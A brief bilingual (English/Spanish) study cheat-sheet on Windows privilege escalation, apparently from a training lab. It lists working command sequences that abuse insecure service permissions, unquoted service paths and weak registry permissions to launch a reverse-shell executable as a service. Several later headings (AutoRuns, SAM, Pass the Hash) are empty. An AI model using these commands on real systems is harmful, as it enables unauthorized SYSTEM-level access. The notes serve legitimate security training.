MANUAL - Windows PrivEsc

Service Exploits - Insecure Service Permissions

accesschk.exe /accepteula -uwcqv user *
accesschk.exe /accepteula -uwcqv user daclsvc
sc qc daclsvc
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
net start daclsvc

La herramienta accesschk.exe con el prefijo uwcqv valida que servicio tiene permisos RW con el usuario actual.

Service Exploits - Unquoted Service Path

sc qc unquotedsvc
accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
net start unquotedsvc

BUILTIN\Users = Significa son todos los usuarios que el sistema operativo crea al instalar el sistema operativo, incluidas las cuentas locales (por ejemplo, invitado, ASP.NET o IUSR_hostname). También incluye todos los usuarios creados en el dominio.

Service Exploits - Weak Registry Permissions

sc qc regsvc
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
net start regsvc

NT AUTHORITY\INTERACTIVE = Significa todos los usuarios que han iniciado sesión.

Service Exploits - Insecure Service Executables

Registry - AutoRuns

Registry - AlwaysInstallElevated

El comando REQ QUERY debe responder algo asi: AlwaysInstallElevated REG_DWORD 0x1

Passwords - Registry

Passwords - Saved Creds

Passwords - Security Account Manager (SAM)

Pass In The HASH

Scheduled Tasks

Startup Apps

Última actualización